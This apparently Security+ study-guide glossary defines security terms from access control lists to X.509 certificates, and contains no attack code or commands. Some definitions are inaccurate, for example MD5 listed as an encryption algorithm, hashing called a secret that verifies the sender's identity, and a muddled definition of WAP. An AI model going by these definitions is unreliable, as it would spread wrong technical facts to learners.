Glossary

A

acceptable use

An organization’s policy that provides specific detail about what users may do with their network access, including email and instant messaging usage for personal purposes, limitations on access times, and the storage space available to each user.

access control list (ACL)

In its broadest sense, an access control list is the underlying data associated with a network resource that defines the access permissions. The most common privileges include the ability to read, write to, delete, and execute a file.

accounting

The tracking of users’ access to resources primarily for auditing purposes.

ActiveX

A Microsoft-developed a precompiled application technology that can be embedded in a web page in the same way as Java applets.

Address Resolution Protocol (ARP) poisoning

This can allow a perpetrator to trick a device into thinking any IP is related to any MAC address. In addition, they can broadcast a fake or spoofed ARP reply to an entire network and poison all computers.

algorithm

A set of sequenced steps that are repeatable. In encryption, the algorithm is used to define how the encryption is applied to data.

anomaly-based monitoring

Anomaly-based monitoring, a subset of behavior-based monitoring, stores normal system behavior profiles and triggers an alarm when some type of unusual behavior occurs.

antispam

A software program that can add another layer of defense to the infrastructure by filtering out undesirable email.

antivirus

A software program used for protecting the user environment that scans for email and downloadable malicious code.

applet

Java-based mini-program that executes when the client machine’s browser loads the hosting web page.

application logging

Application logging has become a major focus of security as we move to a more Web-based world and exploits such as cross-site scripting and SQL injections are an everyday occurrence.

asset

A company or personal resource that has value.

asymmetric key

A pair of key values—one public and the other private—used to encrypt and decrypt data, respectively. Only the holder of the private key can decrypt data encrypted with the public key, which means anyone who obtains a copy of the public key can send data to the private key holder in confidence.

attack signature

A signature that identifies a known method of attack.

auditing

The tracking of user access to resources, primarily for security purposes.

Authentication Header (AH)

A component of the IPsec protocol that provides integrity, authentication, and anti-replay capabilities.

authentication

The process of identifying users.

authorization

The process of identifying what a given user is allowed to do.

availability

Ensures any necessary data is available when it is requested.

B

back door

A method of gaining access to a system or resource that bypasses normal authentication or access control methods.

backup technique

A defined method to provide for regular backups of key information, including user files and email storage, database stores, event logs, and security principal details such as user logons, passwords, and group membership assignments.

baseline

This measure of normal activity is used as a point to determine abnormal system and network behaviors.

behavior-based IDS

A detection method that involves a user noticing an unusual pattern of behavior, such as a continually operating hard drive or a significantly slowed level of performance.

behavior-based monitoring

The use of established patterns of baseline operations to identify variations that may identify unauthorized access attempts.

biometrics

Authentication based on some part of the human anatomy (retina, fingerprint, voice, and so on).

BIOS

Basic Input/Output System is the firmware code run by upon start of a system.

block cipher

Transforms a message from plain text (unencrypted form) to cipher text (encrypted form) one piece at a time, where the block size represents a standard chunk of data that is transformed in a single operation.

botnet

A large number of computers that forward transmissions to other computers on the Internet. You may also hear a botnet referred to a zombie army.

business continuity plan

A plan that describes a long-term systems and services replacement and recovery strategy, designed for use when a complete loss of facilities occurs. A business continuity plan prepares for automatic failover of critical services to redundant offsite systems.

C

centralized key management

Involves a Certificate Authority generating both public and private key pairs for a user and then distributing them to the user.

certificate

An electronic document that includes the user’s public key and the digital signature of the certificate authority (CA) that has authenticated her. The digital certificate can also contain information about the user, the CA, and attributes that define what the user is allowed to do with systems she accesses using the digital certificate.

certificate authority (CA)

A system that issues, distributes, and maintains current information about digital certificates. Such authorities can be private (operated within a company or an organization for its own use) or public (operated on the Internet for general public access).

Certificate Enrollment Protocol (CEP)

A proprietary Cisco protocol that allows Cisco IOS–based routers to communicate with certificate authorities.

certificate life cycle

The period of time a certificate is valid. Issued certificates expire at the end of their lifetime and can be renewed.

Certificate Management Protocol (CMP)

A protocol used for advanced PKI management functions. These functions include certificate issuance, exchange, invalidation, revocation, and key commission.

certificate policy

A statement that governs the usage of digital certificates.

certificate practice statement (CPS)

A document that defines the practices and procedures a CA uses to manage the digital certificates it issues.

certificate revocation

The act of invalidating a digital certificate.

certificate revocation list (CRL)

A list generated by a CA that enumerates digital certificates that are no longer valid and the reasons they are no longer valid.

certificate suspension

The act of temporarily invalidating a certificate while its validity is being verified.

chain of custody

The documentation of all transfers of evidence from one person to another, showing the date, time, and reason for transfer, and the signatures of both parties involved in the transfer. Chain of custody also refers to the process of tracking evidence from a crime scene to the courtroom.

Challenge Handshake Authentication Protocol (CHAP)

A widely used authentication method in which a hashed version of a user’s password is transmitted during the authentication process.

change management

This term indicates that a formal process to schedule, implement, track, and document changes to policies, configurations, systems, and software is used in an organization.

cipher

A method for encrypting text, the term cipher is also used to refer to an encrypted message (although the term cipher text is preferred).

code of ethics

A formal list of rules governing personal and professional behavior that is adopted by a group of individuals or organizations. Many security certifications, including Security+, require their holders to adhere to a code of ethics that’s designed to foster ethical and legal behavior and discourage unethical or illegal behavior.

cold site

A remote site that has electricity, plumbing, and heating installed, ready for use when enacting disaster recovery or business continuity plans. At a cold site, all other equipment, systems, and configurations are supplied by the company enacting the plan.

confidentiality

Involves a rigorous set of controls and classifications associated with sensitive information to ensure that such information is neither intentionally nor unintentionally disclosed.

cookies

Temporary files stored in the client’s browser cache to maintain settings across multiple pages, servers, or sites.

countermeasures

Methods used in some scenarios to provide automatic response in the event of intrustion detection.

cross-certification

When two or more CAs choose to trust each other and issue credentials on each other’s behalf.

cross-site scripting (XSS)

Malicious executable code placed on a website that allows an attacker to hijack a user session to conduct unauthorized access activities, expose confidential data, and provide logging of successful attacks back to the attacker.

cryptographic module

Any combination of hardware, firmware, or software that implements cryptographic functions such as encryption, decryption, digital signatures, authentication techniques, and random number generation.

cryptography

A process that provides a method for protecting information by disguising (encrypting) it into a format that can be read only by authorized systems or individuals.

D

decentralized key management

Key management that occurs when a user generates a public and private key pair and then submits the public key to a certificate authority for validation and signature.

deflection

Redirecting or misdirecting attackers to secured segmented areas, allowing them to assume they have been successful while preventing access to secured resources.

degaussing

A method of removing recorded magnetic fields from magnetic storage media by applying strong cyclic magnetic pulses, thereby erasing the content and making the media unreadable.

demilitarized zone (DMZ)

Also called the neutral zone, a DMZ is an area in a network that allows limited and controlled access from the public Internet.

denial of service (DoS)

A type of attack that denies legitimate users access to a server or services by consuming sufficient system resources or network bandwidth or by rendering a service unavailable.

distributed denial of service (DDoS)

A DDoS attack originates from multiple systems simultaneously thereby causing even more extreme consumption of bandwidth and other resources than a DoS attack.

dictionary attack

An attack in which software is used to compare hashed data, such as a password, to a word in a hashed dictionary. This is repeated until matches are found in the hash, with the goal being to match the password exactly to determine the original password that was used as the basis of the hash.

digital certificate

See certificate.

digital signature

A hash encrypted to a private key of the sender that proves user identity and authenticity of the message. Signatures do not encrypt the contents of an entire message. A digital signature uses data to provide an electronic signature that authenticates the identity of the original sender of the message or data.

disaster recovery

Actions to be taken in case a business is hit with a natural or manmade disaster.

discretionary access control (DAC)

A distributed security method that allows users to set permissions on a per-object basis.

DMZ

See demilitarized zone.

Domain Name Service (DNS) kiting

DNS kiting refers to the practice of taking advantage of the Add Grace Period to monopolize domain names without even paying for them. How domain kiting works is that a domain name is deleted during the five-day AGP and immediately reregistered for another five-day period.

Domain Name Service (DNS) poisoning

DNS poisoning allows a perpetrator to redirect traffic by changing the IP record for a specific domain, thus permitting the attacker to send legitimate traffic anywhere he chooses. This not only sends a requestor to a different website but also caches this information for a short period, distributing the attack’s effect to the server users.

dry-pipe fire suppression

A sprinkler system with pressurized air in the pipes. If a fire starts, a slight delay occurs as the pipes fill with water. This system is used in areas where wet-pipe systems might freeze.

due care

Assurance that the necessary steps are followed to satisfy a specific requirement, which can be an internal or external requirement, as in an agency regulation.

dumpster diving

Scavenging discarded equipment and documents and extracting sensitive information from it without ever contacting anyone in the company.

E

elliptic curve cryptography (ECC)

A method in which elliptic curve equations are used to calculate encryption keys for use in general-purpose encryption.

Encapsulating Security Payload (ESP)

ESP can be used to provide confidentiality, data origin authentication, connectionless integrity, an anti-replay service, and traffic flow confidentiality.

encryption algorithm

A mathematical formula or method used to scramble information before it is transmitted over unsecure media. Examples include RSA, DH, IDEA, Blowfish, MD5, and DSS/DSA.

environment

The physical conditions that affect and influence growth, development, and survival. Used in the security field to describe the surrounding conditions of an area to be protected.

escalation

The upward movement of privileges when using network resources or exercising rights (such as moving from read permissions to write).

evidence

Any hardware, software, or data that can be used to prove the identity and actions of an attacker.

Extensible Markup Language (XML)

A flexible markup language is based on standards from the World Wide Web Consortium XML and is used to provide widely accessible services and data to end users, exchange data among applications, and capture and represent data in a large variety of custom and standard formats.

extranet

A special internetwork architecture wherein a company’s or organization’s external partners and customers are granted access to some parts of its intranet and the services it provides in a secure, controlled fashion.

F

Faraday cage

A metal enclosure used to conduct stray EMEs (electromagnetic emissions) to ground, thereby eliminating signal leakage and the ability of external monitors or detectors to “read” network or computer activity. A Faraday cage can be very small or encompass an entire building, and it is generally used only when security concerns are extremely high (as in national defense, classified areas, or highly sensitive commercial environments).

Federal Information Processing Standard (FIPS)

A standard created by the U.S. government for the evaluation of cryptographic modules. It consists of four levels that escalate in their requirement for higher security levels.

firewall

A hardware device or software application designed to filter incoming or outgoing traffic based on predefined rules and patterns. Firewalls can filter traffic based on protocol uses, source or destination addresses, and port addresses; and they can even apply state-based rules to block unwanted activities or transactions.

forensics

As related to security, forensics is the process of analyzing and investigating a computer crime scene after an attack has occurred and of reconstructing the sequence of events and activities involved in such an attack.

G

Group Policy

Group Policy can be used for ease of administration in managing the environment of users in a Microsoft network. This can include installing software and updates or controlling what appears on the desktop. The Group Policy object (GPO) is used to apply a group policy to users and computers.

guideline

Specific information about how standards should be implemented. A guideline is generally not mandatory, thus acting as a kind of flexible rule used to produce a desired behavior or action. A guideline allows freedom of choice on how to achieve the behavior.

H

hash value

The resultant output or data generated from an encryption hash when applied to a specific set of data. If computed and passed as part of an incoming message and then recomputed upon message receipt, such a hash value can be used to verify the received data when the two hash values match.

hashing

A methodology used to calculate a short, secret value from a data set of any size (usually for an entire message or for individual transmission units). This secret value is recalculated independently on the receiving end and compared to the submitted value to verify the sender’s identity.

honeypot

A decoy system designed to attract hackers. A honeypot usually has all its logging and tracing enabled, and its security level is lowered on purpose. Likewise, such systems often include deliberate lures or bait, in hopes of attracting would-be attackers who think there are valuable items to be attained on these systems.

host-based IDS (HIDS)

Host-based intrusion-detection systems (HIDSs) monitor communications on a host-by-host basis and try to filter malicious data. These types of IDSs are good at detecting unauthorized file modifications and user activity.

hypervisor

A hypervisor controls how access to a computer’s processors and memory is shared. A hypervisor or virtual machine monitor (VMM) is a virtualization platform that provides more than one operating system to run on a host computer at the same time.

hot site

A site that is immediately available for continuing computer operations if an emergency arises. It typically has all the necessary hardware and software loaded, configured and is available 24/7.

Hypertext Transfer Protocol over Secure Sockets Layer (HTTPS)

A protocol used in a secured connection encapsulating data transferred between the client and Web server that occurs on port 443.

I

identity proofing

Identity proofing is an organizational process that binds users to authentication methods. Identity proofing gives the organization assurance that the user performing an authentication is the legitimate user. This is the main component of authentication life cycle management.

incident

Any violation or threatened violation of a security policy.

incident response

A clear action plan on what each response team member needs to do and when it has to be done in the event of an emergency or a security incident.

integrity

Involves a monitoring and management system that performs integrity checks and protects systems from unauthorized modifications to data, system, and application files. When applied to messages or data in transit, integrity checks rely on calculating hash or digest values before and after transmission to ensure nothing changed between the time the data was sent and the time it was received.

Internet Key Exchange (IKE)

A method used in the IPsec protocol suite for public key exchange, security association parameter negotiation, identification, and authentication.

Internet Protocol Security (IPsec)

Used for encryption of TCP/IP traffic, IP Security provides security extensions to IPv4. IPsec manages special relationships between pairs of machines, called security associations.

Internet Security Associate and Key Management Protocol (ISAKMP)

Defines a common framework for the creation, negotiation, modification, and deletion of security associations.

intranet

A portion of the information technology infrastructure that belongs to and is controlled by the company in question.

intrusion

Malicious activity such as denial-of-service attacks, port scans, or attempts to break into computers.

intrusion-detection system (IDS)

A sophisticated network-protection system designed to detect attacks in progress but not to prevent potential attacks from occurring (although many IDSs can trace attacks back to an apparent source; some can even automatically notify all hosts through which attack traffic passes that they are forwarding such traffic).

K

Kerberos authentication

Kerberos defines a set of authentication services and includes the Authentication Service (AS) Exchange protocol, the Ticket-Granting Service (TGS) Exchange protocol, and the Client/Server (CS) Exchange protocol.

key escrow

Key escrow occurs when a CA or other entity maintains a copy of the private key associated with the public key signed by the CA.

key exchange

A technique in which a pair of keys is generated and then exchanged between two systems (typically a client and server) over a network connection to allow a secure connection to be established between them.

key management

The methods for creating and managing cryptographic keys and digital certificates.

knowledge-based detection

Knowledge-based detection relies on the identification of known attack signatures and events that should never occur within a network.

L

Layer 2 Tunneling Protocol (L2TP)

A technology used with a VPN to establish a communication tunnel between communicating parties over unsecure media. L2TP permits a single logical connection to transport multiple protocols between a pair of hosts. L2TP is a member of the TCP/IP protocol suite and is defined in RFC 2661; a framework for creating virtual private networks that uses L2TP appears in RFC 2764.

Lightweight Directory Access Protocol (LDAP)

A TCP/IP protocol that allows client systems to access directory services and related data. In most cases, LDAP is used as part of management or other applications or in browsers to access directory services information.

logic bomb

A piece of software designed to do damage at a predetermined point in time or in response to some type of condition (for example, “disk is 95% full”) or event (for example, some particular account logs in or some value the system tracks exceeds a certain threshold).

logical tokens

A method of access controls used in addition to physical security controls to limit access to data.

M

M of N Control

The process of backing up a private key material across multiple systems or devices. This provides a protective measure to ensure that no one individual can recreate their key pair from the backup.

man in the middle

An attack in which a hacker attempts to intercept data in a network stream and then inserts her own data into the communication with the goal of disrupting or taking over communications. The term itself is derived from the insertion of a third party—the proverbial “man in the middle”—between two parties engaged in communications.

mandatory access control (MAC)

A centralized security method that doesn’t allow users to change permissions on objects.

mantrap

A two-door configuration in a building or office that can lock unwanted individuals in a secured area, preventing them from entering other areas or even from exiting wherever it is they’re being held.

message

The content and format a sender chooses to use to communicate with some receiver across a network, an intranet, an extranet, or the Internet.

message digest

The output of an encryption hash that’s applied to some fixed-size chunk of data. A message digest provides a profound integrity check because even a change to 1 bit in the target data also changes the resulting digest value. This explains why digests are included so often in network transmissions.

misuse

Misuse is typically used to refer to unauthorized access by internal parties.

Multifactor authentication

Multifactor authentication involves the use of two or more different forms of authentication. What you know (logon, password, PIN), what you have (keycard, SecureID number generator), or what you are (biometrics) constitute different forms.

mutual authentication

A situation in which a client provides authentication information to establish identity and related access permissions with a server and in which a server also provides authentication information to the client to ensure that illicit servers cannot masquerade as genuine servers.

N

network access control (NAC)

NAC offers a method of enforcement that helps ensure computers are properly configured. The premise behind NAC is to secure the environment by examining the user’s machine and based on the results, grant access accordingly.

Network Address Translation (NAT)

TCP/IP protocol technology that maps internal IP addresses to one or more external IP addresses through a NAT server of some type. NAT enables the conservation of public IP address space by mapping private IP addresses used in an internal LAN to one or more external public IP addresses to communicate with the external world. NAT also provides address-hiding services thus adding both security and simplicity to network addressing.

network-based IDS (NIDS)

Network-based IDSs monitor the packet flow and try to locate packets that may have gotten through the firewall and that are not allowed for one reason or another. They are best at detecting DoS attacks and unauthorized user access.

network-based IPS (NIPS)

A device or software program designed to sit inline with traffic flows and prevent attacks in real-time.

O

One Time Pad (OTP)

Within an OTP, there are as many bits in the key as there are in the plain text to be encrypted; and as the name suggests, this key is to be random and used only once, with no portion of the key ever being reused.

Online Certificate Status Protocol (OCSP)

An Internet protocol defined by the IETF that is used to validate digital certificates issued by a CA. OCSP was created as an alternative to certificate revocation lists (CRLs) and overcomes certain limitations of CRL.

OSI model

The Open Systems Interconnect model is a logically structured model that encompasses the translation of data entered at the application layer through increasingly more abstracted layers of data, resulting in the actual binary bits passed at the physical layer.

P

passive detection

A method of intrusion detection that has an IDS present in the network in a silent fashion; it does not interfere with communications in progress.

pattern matching

A network-analysis approach that compares each individual packet against a database of signatures. The inherent weakness in this method is that such patterns must be known (and definitions in place) before they can be used to recognize attacks or exploits.

performance baseline

See baseline.

performance monitoring

The act of using tools to monitor changes to system and network performance.

personally identifiable information (PII)

Privacy-sensitive information that identifies or can be used to identify, contact, or locate the person to whom such information pertains.

Point-to-Point Tunneling Protocol (PPTP)

A TCP/IP technology used to create virtual private networks (VPN) or remote-access links between sites or for remote access. PPTP is generally regarded as less secure than L2TP and is used less frequently for that reason.

policy

A broad statement of views and positions. A policy that states high-level intent with respect to a specific area of security is more properly called a security policy.

pop-up blocker

A program used to block a common method for Internet advertising, using a window that pops up in the middle of your screen to display a message when you click a link or button on a website.

Pretty Good Privacy (PGP)

A shareware encryption technology for communications that utilizes both public and private encryption technologies to speed up encryption without compromising security.

private key

In encryption, this is the key used to unencrypt a message.

privilege escalation

A method of software exploitation that takes advantage of a program’s flawed code. Usually, this crashes the system and leaves it in a state where arbitrary code can be executed or an intruder can function as an administrator.

privilege management

The process of controlling users and their capabilities on a network.

probability

Used in risk assessment, probability measures the likelihood or chance that a threat will actually exploit some vulnerability.

procedure

A procedure specifies how policies will be put into practice in an environment (that is, it provides necessary how-to instructions).

protocol analyzer

Protocol analyzers help troubleshoot network issues by gathering packet level information across the network. These applications capture packets and decode the information into readable data for analysis.

Public Branch Exchange (PBX)

A telephone switch used on a company’s or organization’s premises to create a local telephone network. Using a PBX eliminates the need to order numerous individual phone lines from a telephone company and permits PBX owners to offer advanced telephony features and functions to their users.

public key

A key that is made available to whoever is going to encrypt the data sent to the holder of a private key.

Public Key Cryptography Standards (PKCS)

The de facto cryptographic message standards developed and published by RSA Laboratories.

public key infrastructure (PKI)

A paradigm that encompasses certificate authorities and X.509 certificates used with public encryption algorithms to distribute, manage, issue, and revoke public keys. Public key infrastructures typically also include registration authorities to issue and validate requests for digital certificates, a certificate-management system of some type, and a directory in which certificates are stored and can be accessed. Together, all these elements make up a PKI.

Public Key Infrastructure based on X.509 Certificates (PKIX)

A working group of the Internet Engineering Task Force (IETF) focused on developing Internet standards for certificates.

R

receiver

The party that receives a message from its sender.

redundancy planning

The process of planning for continuing service in the event of failure by providing more than one of the same components or services.

redundant array of inexpensive disks (RAID)

A redundant array of inexpensive disks is an organization of multiple disks into a large, high-performance logical disk to provide redundancy in the event of a disk failure.

Remote Authentication Dial-In User Services (RADIUS)

An Internet protocol, used for remote-access services. It conveys user authentication and configuration data between a centralized authentication server and a remote-access server (RADIUS client) to permit the remote access server to authenticate requests to use its network access ports.

replay

An attack that involves capturing valid traffic from a network and then retransmitting that traffic at a later time to gain unauthorized access to systems and resources.

removable storage

This is a small, high-capacity, removable device that can store information such as an iPod, thumb drive, or cell phone.

restoration

The process whereby data backups are restored into the production environment.

retention policy

Documentation of the amount of time an organization will retain information.

risk

The potential that a threat might exploit some vulnerability.

role

A defined behavior for a user or group of users based on some specific activity or responsibilities. (For example, a tape backup administrator is usually permitted to back up all files on one or more systems; that person might or might not be allowed to restore such files, depending on the local security policies in effect.)

role-based access control (RBAC)

A security method that combines both MAC and DAC. RBAC uses profiles. Profiles are defined for specific roles within a company, and then users are assigned to such roles. This facilitates administration in a large group of users because when you modify a role and assign it new permissions, those settings are automatically conveyed to all users assigned to that role.

rollback

A process used to undo changes or transactions when they do not complete, when they are suspected of being invalid or unwanted, or when they cause problems.

rootkit

A piece of software that can be installed and hidden on a computer mainly for the purpose of compromising the system.

round

A selection of encrypted data that is split into two or more blocks of data. Each block of data is then run through an encryption algorithm that applies an encryption key to each block of data individually, rather than applying encryption to the entire selection of data in a single operation.

router

A device that connects multiple network segments and routes packets between them. Routers split broadcast domains.

rule-based access control (RBAC)

A rule-based access control method is an extension of access control that includes stateful testing to determine whether a particular request for resource access may be granted. When a rule-based method is in force, access to resources may be granted or restricted based on conditional testing.

S

Secure Hypertext Transfer Protocol (S-HTTP)

An alternative to HTTPS is the Secure Hypertext Transport Protocol developed to support connectivity for banking transactions and other secure Web communications.

Secure/Multipurpose Internet Mail Extensions (S/MIME)

An Internet protocol governed by RFC 2633 and used to secure email communications through encryption and digital signatures for authentication. It generally works with PKI to validate digital signatures and related digital certificates.

Secure Shell (SSH)

A protocol designed to support secure remote login, along with secure access to other services across an unsecure network. SSH includes a secure transport layer protocol that provides server authentication, confidentiality (encryption), and integrity (message digest functions), along with a user-authentication protocol and a connection protocol that runs on top of the user-authentication protocol.

Secure Sockets Layer (SSL)

An Internet protocol that uses connection-oriented, end-to-end encryption to ensure that client/server communications are confidential (encrypted) and meet integrity constraints (message digests). Because SSL is independent of the application layer, any application protocol can work with SSL transparently. SSL can also work with a secure transport layer protocol, which is why the term SSL/TLS appears frequently. See also Transport Layer Security.

security association (SA)

A method in IPsec that accounts for individual security settings for IPsec data transmission.

security baseline

Defined in a company’s or organization’s security policy, a security baseline is a specific set of security-related modifications to and patches and settings for systems and services in use that underpins technical implementation of security.

security groups

A logical boundary that helps enforce security policies.

security policies

Documentation of the goals and elements of an organization’s systems and resources.

sender

The party that originates a message.

sequence number

A counting mechanism in IPsec that increases incrementally each time a packet is transmitted in an IPsec communication path. It protects the receiver from replay attacks.

service level agreement (SLA)

A contract between two companies or a company and individual that specifies, by contract, a level of service to be provided by one company to another. Supplying replacement equipment within 24 hours of loss of that equipment or related services is a simple example of an SLA.

signature-based monitoring

A signature-based monitoring method is sometimes considered a part of the misuse-detection category. This type of monitoring method looks for specific byte sequences or signatures that are known to appear in attack traffic. The signatures are identified through careful analysis of the byte sequence from captured attack traffic.

Simple Network Management Protocol (SNMP)

A UDP-based application layer Internet protocol used for network management, SNMP is governed by RFCs 2570 and 2574. In converting management information between management consoles (managers) and managed nodes (agents), SNMP implements configuration and event databases on managed nodes that can be configured to respond to interesting events by notifying network managers.

Simple Mail Transport Protocol (SMTP) relay

An exploitation of SMTP relay agents used to send out large numbers of spam messages.

single sign-on (SSO)

The concept or process of using a single logon authority to grant users access to resources on a network regardless of what operating system or application is used to make or handle a request for access. The concept behind the term is that users need to authenticate only once and can then access any resources available on a network.

smart card

A credit card–size device that contains an embedded chip. On this chip, varying and multiple types of data can be stored, such as a driver’s license number, medical information, passwords, or other authentication data, and even bank account data.

sniffer

A hardware device or software program used to capture and analyze network data in real time. Because such a device can typically read and interpret all unencrypted traffic on the cable segment to which it is attached, it can be a powerful tool in any competent hacker’s arsenal.

social engineering

The process of using human behavior to attack a network or gain access to resources that would otherwise be inaccessible. Social engineering is a term that emphasizes the well-known fact that poorly or improperly trained individuals can be persuaded, tricked, or coerced into giving up passwords, phone numbers, or other data that can lead to unauthorized system access, even when strong technical security measures can otherwise prevent such access.

spam

A term that refers to the sending of unsolicited commercial email.

spoofing

A technique for generating network traffic that contains a different (and usually quite specific) source address from that of the machine actually generating the traffic. Spoofing is used for many reasons in attacks: It foils easy identification of the true source, it permits attackers to take advantage of existing trust relationships, and it deflects responses to attacks against some (usually innocent) third party or parties.

spyware

Software that communicates information from a user’s system to another party without notifying the user.

standard

This term is used in many ways. In some contexts, it refers to best practices for specific platforms, implementations, OS versions, and so forth. Some standards are mandatory and ensure uniform application of a technology across an organization. In other contexts, a standard might simply describe a well-defined rule used to produce a desired behavior or action.

steganography

Steganography is a word of Greek origin meaning hidden writing, which can be further described as both an art and a science for simply hiding messages so that unintended recipients wouldn’t even be aware of any message.

storage policy

A policy defining the standards for storing each classification level of data.

switch

A hardware device that manages multiple, simultaneous pairs of connections between communicating systems. Switches split collision domains, but can also provide greater aggregate bandwidth between pairs or groups of communicating devices because each switched link normally gets exclusive access to available bandwidth.

symmetric key

A single encryption key that is generated and used to encrypt data. This data is then passed across a network. After that data arrives at the recipient device, the same key used to encrypt that data is used to decrypt it. This technique requires a secure way to share keys because both the sender and receiver use the same key (also called a shared secret because that key should be unknown to third parties).

system logging

The process of collecting system data to be used for monitoring and auditing purposes.

system monitoring

A method of monitoring used to analyze events that occur on individual systems.

T

Terminal Access Controller Access-Control System Plus (TACACS+)

An authentication, access control, and accounting standard that relies on a central server to provide access over network resources, including services, file storage, and network routing hardware.

threat

A danger to a computer network or system (for example, a hacker or virus represents a threat).

token

This is a hardware- or software-based system used for authentication wherein two or more sets of matched devices or software generate matching random passwords with a high degree of complexity.

Transmission Control Protocol/Internet Protocol (TCP/IP) hijacking

A process used to steal an ongoing TCP/IP session for the purposes of attacking a target computer. Essentially, hijacking works by spoofing network traffic so that it appears to originate from a single computer, when in actuality it originates elsewhere so that the other party in the communication doesn’t realize another computer has taken over an active communications session.

Transport Layer Security (TLS)

An end-to-end encryption protocol originally specified in ISO Standard 10736 that provides security services as part of the transport layer in a protocol stack.

Trojan

A form of malware that appears to be useful software but has code hidden inside that will attack your system directly or allow the system to be infiltrated by the originator of the code when it is executed. A Trojan horse is software hidden inside other software and is commonly used to infect systems with viruses, worms, or remote-control software.

Trusted Platform Module (TPM)

A secure cryptoprocessor used to authenticate hardware devices such as PC or laptop.

U–V

uninterruptible power supply (UPS)

A power supply that sits between the wall power and the computer. In the event of power failure at the wall, the UPS takes over and powers the computer so that you can take action before data loss occurs.

video surveillance

A surveillance method using closed-circuit television (CCTV), with which the picture is viewed or recorded as a means of security.

virtualization technology

A technology developed to allow a guest operating system to run along with a host operating system while using one set of hardware.

virtual local area network (VLAN)

A software technology that allows for the grouping of network nodes connected to one or more network switches into a single logical network. By permitting logical aggregation of devices into virtual network segments, VLANs offer simplified user management and network resource access controls for switched networks.

virtual private network (VPN)

A popular technology that supports reasonably secure, logical, private network links across some unsecure public network infrastructure, such as the Internet. VPNs are more secure than traditional remote access because they can be encrypted and because VPNs support tunneling (the hiding of numerous types of protocols and sessions within a single host-to-host connection).

virus

A piece of malicious code that spreads to other computers by design; although some viruses also damage the systems on which they reside. Viruses can spread immediately upon reception or implement other unwanted actions, or they can lie dormant until a trigger in their code causes them to become active. The hidden code a virus executes is called its payload.

vulnerability

A weakness in hardware or software that can be used to gain unauthorized or unwanted access to or information from a network or computer.

W

warm site

A backup site that has some of the equipment and infrastructure necessary for a business to begin operating at that location. Typically, companies or organizations bring their own computer systems and hardware to a warm site, but that site usually already includes a ready-to-use networking infrastructure and also might include reliable power, climate controls, lighting, and Internet access points.

wet-pipe fire suppression

A sprinkler system with pressurized water in its pipes. If a fire starts, the pipes release water immediately and offer the fastest and most effective means of water-based fire suppression.

whole disk encryption

Whole disk encryption can either be hardware or software based, and is meant to encrypt the entire contents of the drive. This can include even temporary files and memory.

Wi-Fi

Short term for Wireless Fidelity communication standard.

Wireless Application Protocol (WAP)

A long-range mobile equipment communications used by server-side processes to perform functions needed within the website.

Wired Equivalent Privacy (WEP)

A security protocol used in IEEE 802.11 wireless networking, WEP is designed to provide security equivalent to that found in regular wired networks. This is achieved by using basic symmetric encryption to protect data sent over wireless connections so that sniffing of wireless transmissions doesn’t produce readable data and so that drive-by attackers cannot access a wireless LAN without additional effort and attacks.

wireless local area networks (WLANs)

A networking technology that uses high-frequency radio waves rather than wires to communicate between nodes.

Wireless Transport Layer Security (WTLS)

WTLS defines a security level for applications based on the Wireless Application Protocol (WAP). As its acronym indicates, WTLS is based on transport layer security (TLS) but has been modified to work with the low-bandwidth, high-latency, and limited-processing capabilities found in many wireless networking implementations. WTLS also provides authentication, data integrity, and confidentiality mechanisms, all based on encryption methods using shared 56- or 128-bit symmetric keys.

worm

A special type of virus designed primarily to reproduce and replicate itself on as many computer systems as possible, a worm does not normally alter files but rather remains resident in a computer’s memory. Worms typically rely on access to operating system capabilities that are invisible to users.

X–Y–Z

X.500 directory

A standard that regulates global, distributed directory services databases, it’s also known as a white pages directory (because lookup occurs by name, rather than by job role or other categorized information, as in a yellow pages type of system).

X.509 digital certificate

A digital certificate that uniquely identifies a potential communications party or participant. Among other things, an X.509 digital certificate includes a party’s name and public key, but it can also include organizational affiliation, service or access restrictions, and a host of other access- and security-related information.